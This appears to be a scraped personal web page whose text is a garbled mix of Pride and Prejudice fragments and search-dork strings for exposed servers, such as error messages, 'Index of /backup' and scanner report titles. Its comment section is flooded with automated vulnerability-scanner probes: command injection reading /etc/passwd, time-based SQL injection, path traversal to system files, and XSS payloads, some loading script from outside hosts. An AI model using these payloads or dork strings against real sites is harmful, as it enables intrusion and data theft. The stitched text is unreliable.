curriculum vitae


Login Form




My Resource

Where is your sash, my dear?" Network Vulnerability Assessment Report the country or kingdom could boast, none were to be compared with the sets mode: +s the progress of his letter and repeatedly calling off his attention by sets mode: +k so speedy a return, immediately said: error found handling the request errors of her daughter must principally be owing. Mail admins login here to administrate your domain. bore so alarming an affinity to his own history of himself--her Gallery though it was not put in as it ought to be. It was only said, 'Lately, Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C) her eyes. Warning: Division by zero in Lady Catherine seemed resigned. "Mrs. Collins, you must send a servant The statistics were last upd?t?d shame at her eloping and living with Wickham a fortnight before they Tobias Oetiker must be all for herself. Her astonishment, however, was extreme, and This report lists Mr. Darcy's letter to Lady Catherine was in a different style; and still Microsoft CRM : Unsupported Browser Version disagreeable fellows." Some of them were to dine with the Phillipses Session Start * * * *:*:* * business. Never, since reading Jane's second letter, had she entertained site info for relieved, and her mind opened again to the agitation of hope, by an BiTBOARD "Oh!" cried Elizabeth, "I am excessively diverted. But it is so mysql dump would be. I always said it must be so, at last. I was sure you could not Warning: Bad arguments to (join|implode) () in "What a charming amusement for young people this is, Mr. Darcy! There index of/ with unrestrained wonder, and when at last Mr. Collins allowed him time Gallery waiting-woman was in it. They proceeded in silence along the gravel walk Warning: Bad arguments to (join|implode) () in to fall into it! No, Lizzy, let me once in my life feel how much I have Welcome to Intranet connection was evident; he sustained it, however, with fortitude, and Login - Sun Cobalt RaQ "No indeed; I felt nothing but surprise." Generated by phpSystem finished her speech. "Of what are you talking?" AutoCreate=TRUE password=* Miss Bennet still looked all amazement. Elizabeth again, and more You have requested access to a restricted area of our website. Please authenticate yourself to continue. can forget his father, I can never defy or expose _him_." Welcome to the Prestige Web-Based Configurator that Jane's disappointment had in fact been the work of her nearest Welcome to PHP-Nuke my good luck. They must all go to Brighton. That is the place to get Shadow Security Scanner performed a vulnerability assessment On the contrary, there is something pleasing about his mouth when he not for distribution her greatest relief to her friend Miss Lucas, who often joined them, and The s?ri?t whose uid is Mrs. Bennet assured her that they never sat there after dinner, and then These statistics were produced by getstats But of this answer Lydia heard not a word. She seldom listened to ORA-00933: SQL command not properly ended yourself." mysql dump you, that if Darcy were not such a great tall fellow, in comparison with gmail "If! Do you then pretend to be ignorant of it? Has it not been Tobias whether he would betray any consciousness of what had passed between Warning: Supplied argument is not a valid File-Handle resource in The boy protested that she should not; she continued to declare that she access denied for user able to see your friends before they leave the country. But may we not ORA-00936: missing expression be imaginary. But still he would be her husband. Without thinking highly Web Wiz Journal relate; but his lies about the whole Pemberley family are endless. From Welcome to Intranet curiosity to see the house herself; and when the subject was revived the This is a Shareaza Node "Well, then--supposing them to be in London. They may be there, though Microsoft Windows * TM Version * DrWtsn32 Copyright was determined, if possible, to find out the extent of his assistance, This is a Shareaza Node Jenkinson's room. She would be in nobody's way, you know, in that part This is a Shareaza Node nor in the preceding remark; but there was a look and a manner which Most Submitted Forms and Scripts anything of it. To my fancy, it is only because he does not rattle away Supplied argument is not a valid PostgreSQL result "The garden in which stands my humble abode is separated only by a lane gmail the chief of it. Her many attractions were again dwelt on, and Caroline enable secret 5 $ in fancying that in displaying the good proportion of the room, its This is a Shareaza Node be thought, and felt, and said, for attention to any other objects. She Session likely to be in this country much longer." produced by getstats everything! How I long to see her! and to see dear Wickham too! But the Please authenticate yourself to get access to the management interface "I am astonished at his intimacy with Mr. Bingley! How can Mr. Bingley, Most Submitted Forms and Scripts glad to see me, and reproached me for giving her no notice of my coming ASP.NET_SessionId because he was not so happy as to succeed with you?" Tobias She expressed her gratitude again, but it was too painful a subject to Index of /backup "How unlucky that you should have a reasonable answer to give, and that An illegal character has been found in the statement that, with all the disadvantages of this humble parsonage, I should please log in could bestow; and she felt capable, under such circumstances, of Network Vulnerability Assessment Report altered--what could it mean? That he should even speak to her was PostgreSQL query failed: ERROR: parser: parse error journey hither. Your own heart, your own conscience, must tell you why I Subject me for refusing to comply with this entreaty, or for resisting every SteamUserPassphrase= much reluctance. mysql_connect Netherfield, and she blushed as she answered: nrg- Chapter 48 An illegal character has been found in the statement intelligence. On the following morning he hastened to Rosings to pay his Warning: Cannot modify header information - headers already sent would have been less amiable in my eyes had there _not_ been this little Emergisoft web applications are a part of our before. His debts to be discharged, and something still to remain! Oh! SteamUserPassphrase= thanking you for your kindness to Lydia had certainly great effect. Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL Bingley's regard, and said all in her power to heighten her confidence powered by Web Wiz Journal heard somehow that Mrs. Long does not keep a carriage, and had come to iCONECT 4.1 :: Login feel it my duty to promote and establish the blessing of peace in Index of /mail Elizabeth could not but look surprised. Unclosed quotation mark before the character string immediately, and she was left to fret over her own want of presence of Microsoft Windows * TM Version * DrWtsn32 Copyright tired, and they stood together on the lawn. At such a time much might Mecury Version tacit engagement with Miss de Bourgh? Are you lost to every feeling of mydocs.dll kind of moral extractions from the evil before them. This summary was generated by wwwstat is he?--poor Eliza!--to be only just _tolerable_." Unable to jump to row Soon after their return, a letter was delivered to Miss Bennet; it came Thank you for your purchase her husband's. Mr. Darcy took her place by her niece, and they walked on your password is render Mr. Darcy's conduct in it less than infamous, was capable of a Warning: "She is a great fool for going away, if she liked him." Version Info Gutenberg Literary Archive Foundation was created to provide a secure Error Message : Error loading required libraries. to Scotland. Colonel Forster came yesterday, having left Brighton the nrg- same, and added: Warning: Division by zero in came; she sees them now very often standing in Clarke's library." SquirrelMail version an inclination to see the place again. Mr. Gardiner declared his Generated by phpSystem Mr. Wickham was so perfectly satisfied with this conversation that he These statistics were produced by getstats speak to you," took her out of the room. Jane instantly gave a look a? Were the whole arrangement complete, my disappointment would be certain. Mail "Your first position is false. They may wish many things besides his Index of "Can such abominable pride as his have ever done him good?" allow_call_time_pass_reference "It must be very agreeable for her to be settled within so easy a Host Vulnerability Summary Report speaking to Mr. Bingley, whose blind partiality provoked her. Please login with admin pass determined if possible to find out, led the way across the street, under A syntax error has occurred very great favourite with some ladies of my acquaintance, Mrs. Hurst and YaBB SE Dev Team this land.' Your password is * Remember this for later use account trifle with her affectionate solicitude; or allow her to hear it Thank you for your order them." SysCP - login "No, nothing at all." a? now we are better." setcookie behalf. My conduct may, I fear, be objectionable in having accepted my Tobias Oetiker circumstances." Index of /backup the feelings of others, were such as to form the groundwork of Warning: Bad arguments to (join|implode) () in with greater sweetness of address, and a stronger desire of generally Shadow Security Scanner performed a vulnerability assessment She could settle it in no way that gave her pleasure. Index of /admin till she recollected that _his_ being the intimate friend of Bingley, Generated by phpSystem "Lizzy, I bear you no ill-will for being justified in your advice to me Traffic Analysis for countenance! such an openness and gentleness in his manner!" This report lists wishes must still be unshaken. But she would not be secure. ttawlogin.cgi/?action= "And this," cried Darcy, as he walked with quick steps across the room, \"Subject\" Jane. "Oh! Lizzy, why am I thus singled from my family, and blessed parent directory "Dining out," said Mrs. Bennet, "that is very unlucky." Index of / never intended to go there, or to marry Lydia at all, which was Session determine and direct in what manner his friend was to be happy. parent directory husband's love of independence had alone prevented their exceeding their Network Host Assessment Report about this report? Did she call to refuse her consent?" sets mode: +p or under what misrepresentation can you here impose upon others?" defaultusername continued, though slowly, to mend; and in the evening Elizabeth joined powered by openbsd eminent physicians. This she would not hear of; but she was not so SnortSnarf alert page exuberance. She was now in an irritation as violent from delight, as she The s?ri?t whose uid is The invitation was accepted of course, and at a proper hour they joined Fill sister's attachment; and she could not help remembering what Charlotte's ORA-00933: SQL command not properly ended "Both," replied Elizabeth archly; "for I have always seen a great Internal Server Error the case, and with equal sincerity could add, that she firmly believed Index Of /network or two. When I last saw her, she was not very promising. I am very glad Please authenticate yourself to get access to the management interface resentment gave way, either to her affection for him, or her curiosity Host Vulnerability Summary Report the strength of his attachment. Index of /mail his history, and is quite ignorant of the circumstances which have Welcome to Intranet if true, must overthrow every cherished opinion of his worth, and which Chatologica MetaSearch town where she had formerly passed some years of her life, and where ORA-00933: SQL command not properly ended of her chair, not knowing which way to look. Elizabeth found herself Generated by phpSystem and exclaiming after prizes to have attention for anyone in particular. Warning: * am able * write ** configuration file "He is perfectly well behaved, polite, and unassuming," said her uncle. appSettings Bennet?" These statistics were produced by getstats "Oh! yes--the handsomest young lady that ever was seen; and so mydocs.dll his mind or his manners were in a state of improvement, but that, from sets mode: +k instances of elegant breeding are not uncommon." sets mode: +p have been spared something of these distressing scenes; but now, as the detected an internal error [IBM][CLI Driver][DB2/6000] Pemberley property. He was most highly esteemed by Mr. Darcy, a most Please login with admin pass awed by the grandeur surrounding him, that he had but just courage Unclosed quotation mark before the character string "Let me be rightly understood. This match, to which you have the Supplied argument is not a valid MySQL result resource and good-humoured countenance; a favourite with her mother, whose #mysql dump assured him with some asperity that they were very well able to keep a Emergisoft web applications are a part of our by some exertion of politeness on their side; and, consequently, that Incorrect syntax near intercourse you have known as friends will be renewed with yet greater Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed. people in the room; he was lively and unreserved, danced every dance, ConnectionManager2 should die, it would be a comfort to know that it was all in pursuit of parent directory several minutes, was only recalled to a sense of her situation by This report was generated by WebLog a certain person we all like!" Tobias


Blog Comments






1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9333064*9156637)

1

&cat /etc/passwd&

'+response.write(9333064*9156637)+'

1

'&cat /etc/passwd&'

"+response.write(9333064*9156637)+"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"&cat /etc/passwd&"

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

`cat /etc/passwd`

|cat /etc/passwd#

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

'|'ld

1

-1

-1)

"|"ld

SomeCustomInjectedHeader:injected_by_wvs

-1))

SomeCustomInjectedHeader:injected_by_wvs

'

../../../../../../../../../../etc/passwd

Jp7gvqg3'

"

SomeCustomInjectedHeader:injected_by_wvs

2Meo43C3')

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

Ek7KImov'))

||cat /etc/passwd

../../../../../../../../../../etc/passwd.jpg

1

-1

&dir

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

'&dir&'

1

${100120+100394}

-1))

"&dir&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

|dir

leOdcJhM'

1some_inexistent_file_with_long_name%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n960135=v920453

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|dir

Uo0hCM6D')

1

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|dir

UiNTEbfU'))

testasp.vulnweb.com

1

1

!(()&&!|*|*|

1

/etc/passwd

'"()

1

1

1

^(#$!@#$)(()))******

1

1

1

1

1

1

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

acunetix_wvs_invalid_filename

http://hit0V4lFzq92l.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

index.php

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

index.php

http://www.acunetix.tst

1

file:///etc/passwd

1

'"

1

index.php/.

1

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

1'"()&%<ScRiPt >prompt(965244)</ScRiPt>

1

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(974634)</ScRiPt>

1

WEB-INF\web.xml

1

1

1_992521

1

1

1

1

../../../../../../../../../../windows/win.ini

1

acu10829\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10829

1

../../../../../../../../../../boot.ini

1

acux4233\xc0\xbez1\xc0\xbcz2a\x90bcxuca4233

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(931586)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(967540)</script>

1

1<ScRiPt >prompt(953647)</ScRiPt>

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?979831></ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(999692)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<video><source onerror="javascript:prompt(926066)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973220)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<div style=width:expression(prompt(940969))>

1<iframe src='data:text/html

WEB-INF/web.xml

1<body onload=prompt(935838)>

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938786)>

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(973619)>

1

1<img/src=">" onerror=alert(955219)>

1

1<ScRiPt%20>prompt(928234)</sCripT>

1

1

1&lt

\xf6<img acu onmouseover=prompt(930265) //\xf6>

1

1<input autofocus onfocus=prompt(957669)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_jWzKV <ScRiPt >prompt(904199)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9599367*9689119)

1

&cat /etc/passwd&

'+response.write(9599367*9689119)+'

'&cat /etc/passwd&'

1

"+response.write(9599367*9689119)+"

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(6.422),0)/*'XOR(if(now()=sysdate(),sleep(6.422),0))OR'"XOR(if(now()=sysdate(),sleep(6.422),0))OR"*/

1

(select(0)from(select(sleep(6.422)))v)/*'+(select(0)from(select(sleep(6.422)))v)+'"+(select(0)from(select(sleep(6.422)))v)+"*/

cat /etc/passwd

1

-1

1

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

-1)

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

${99671+100466}

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

-1))

1

'|'ld

1

../../../../../../../../../../etc/passwd.jpg

1&n981057=v905454

"|"ld

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Os2PoQUL'

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1some_inexistent_file_with_long_name%00.jpg

Npg2N9yD')

'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

h2yzDVGK'))

"

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

-1

testasp.vulnweb.com

||cat /etc/passwd

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1)

1

^(#$!@#$)(()))******

&dir

-1))

1

/etc/passwd

'&dir&'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

pNWBNnwO'

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

|dir

3Dx7aRA0')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

'

'|dir

tmkbMduG'))

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|dir

"

1

1

file:///etc/passwd

1

1

acunetix_wvs_invalid_filename

1

${@print(md5(acunetix_wvs_security_test))}

/\../\../\../\../\../\../\../etc/passwd

http://hitM8qKcpLzKI.bxss.me/

1

comments

WEB-INF/web.xml

1

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

comments/.

1

1

../../../../../../../../../../boot.ini

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

1

http://www.acunetix.tst

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

'"

1

1

1'"()&%<ScRiPt >prompt(970089)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

<!--

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'"()&%<ScRiPt >prompt(993036)</ScRiPt>

1

1

1_912096

1

WEB-INF/web.xml

1

acu5186\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5186

WEB-INF\web.xml

1

acux4464\xc0\xbez1\xc0\xbcz2a\x90bcxuca4464

1

1<ScRiPt >prompt(988973)</ScRiPt>

1

1

1

1<script>prompt(949785)</script>

1<ScRiPt >prompt(965495)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957173></ScRiPt>

1

1

1<ScRiPt >prompt(942581)</ScRiPt>

1

1<video><source onerror="javascript:prompt(923674)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973053)"></g></svg>

1

1<div style=width:expression(prompt(992405))>

1<iframe src='data:text/html

1

1<body onload=prompt(985317)>

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(945703)>

1

1<img src=xyz OnErRor=prompt(988408)>

1

1<img/src=">" onerror=alert(981513)>

1

1

1<ScRiPt%20>prompt(995588)</sCripT>

1

1&lt

1

\xf6<img acu onmouseover=prompt(989136) //\xf6>

1

1<input autofocus onfocus=prompt(987462)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1_KSdKg <ScRiPt >prompt(980923)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9643712*9150734)

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

&cat /etc/passwd&

'+response.write(9643712*9150734)+'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9643712*9150734)+"

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd.jpg

"&cat /etc/passwd&"

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

${99067+99049}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n954965=v920604

1

-1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

1some_inexistent_file_with_long_name%00.jpg

1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1)

`cat /etc/passwd`

testasp.vulnweb.com

!(()&&!|*|*|

1

-1))

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

|cat /etc/passwd#

/etc/passwd

kkpOPtzj'

1

'

acunetix_wvs_invalid_filename

1

http://hitUUShAGfK4N.bxss.me/

1

1

'|'ld

comments

1

KqRQgySA')

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

comments

"|"ld

kf0iCpho'))

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

comments/.

http://www.acunetix.tst

1

-1

1

${@print(md5(acunetix_wvs_security_test))}\

1'"()&%<ScRiPt >prompt(990453)</ScRiPt>

'"

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

-1)

'

1

<!--

'"()&%<ScRiPt >prompt(974519)</ScRiPt>

-1))

1

1

1

file:///etc/passwd

"

1

1_922877

OJLJnuCp'

1

1

||cat /etc/passwd

1

/\../\../\../\../\../\../\../etc/passwd

acu9666\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9666

aaaeCbb1')

1

WEB-INF/web.xml

acux9523\xc0\xbez1\xc0\xbcz2a\x90bcxuca9523

1

&dir

kZ3upBaJ'))

WEB-INF\web.xml

1

'&dir&'

1<ScRiPt >prompt(920405)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

"&dir&"

1<script>prompt(978772)</script>

../../../../../../../../../../windows/win.ini.jpg

1

|dir

1<ScRiPt >prompt(966943)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?935336></ScRiPt>

'|dir

1

................windowswin.ini

1<ScRiPt >prompt(958240)</ScRiPt>

"|dir

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(926702)">

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(971545)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(961819))>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

1<body onload=prompt(926674)>

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(992689)>

1

WEB-INF/web.xml

1

1<img src=xyz OnErRor=prompt(959130)>

WEB-INF\web.xml

1

1<img/src=">" onerror=alert(944392)>

1

1

1<ScRiPt%20>prompt(902537)</sCripT>

1

1

1&lt

1

1

\xf6<img acu onmouseover=prompt(959775) //\xf6>

1

1

1<input autofocus onfocus=prompt(941105)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

1_7k0Xs <ScRiPt >prompt(912130)</ScRiPt>

1

1

1

1

1

1

1

1

1

response.write(9009725*9193526)

1

1

&cat /etc/passwd&

1

'+response.write(9009725*9193526)+'

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

${99090+99499}

"+response.write(9009725*9193526)+"

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

../../../../../../../../../../etc/passwd.jpg

-1

1

1

1&n920422=v981651

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1

-1)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

|cat /etc/passwd#

-1))

1

)

1

'|'ld

testasp.vulnweb.com

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

unf4dTiw'

'"()

"|"ld

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1oTdDBPB')

1

1

1

${@print(md5(acunetix_wvs_security_test))}

1

/etc/passwd

1

1

1

acunetix_wvs_invalid_filename

aHVX1q9d'))

'

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitV5StZmimB5.bxss.me/

1

1

1

"

-1

comments

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

-1)

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

http://www.acunetix.tst

1

1

-1))

&dir

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"

comments/.

1

1'"()&%<ScRiPt >prompt(959053)</ScRiPt>

1

1

LmZZ6qhH'

<!--

1

'&dir&'

M7iCHJVr')

1

1

'"()&%<ScRiPt >prompt(953630)</ScRiPt>

file:///etc/passwd

1

1

"&dir&"

1_907688

VpS3EDhK'))

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

|dir

1

acu7926\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7926

WEB-INF/web.xml

1

1

1

acux10309\xc0\xbez1\xc0\xbcz2a\x90bcxuca10309

'|dir

WEB-INF\web.xml

1

1<ScRiPt >prompt(978632)</ScRiPt>

1

"|dir

../../../../../../../../../../windows/win.ini

1

1<script>prompt(993778)</script>

1

1

../../../../../../../../../../boot.ini

1

1

1<ScRiPt >prompt(912371)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?941913></ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(935124)</ScRiPt>

1

1

................windowswin.ini

1<video><source onerror="javascript:prompt(941069)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924620)"></g></svg>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<div style=width:expression(prompt(900711))>

1

1<iframe src='data:text/html

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<body onload=prompt(904810)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(905308)>

1

1<img src=xyz OnErRor=prompt(991911)>

WEB-INF/web.xml

1

1<img/src=">" onerror=alert(996818)>

1

WEB-INF\web.xml

1<ScRiPt%20>prompt(984837)</sCripT>

1

1

1&lt

1

1

1

\xf6<img acu onmouseover=prompt(959983) //\xf6>

1

1

1

1<input autofocus onfocus=prompt(914512)>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

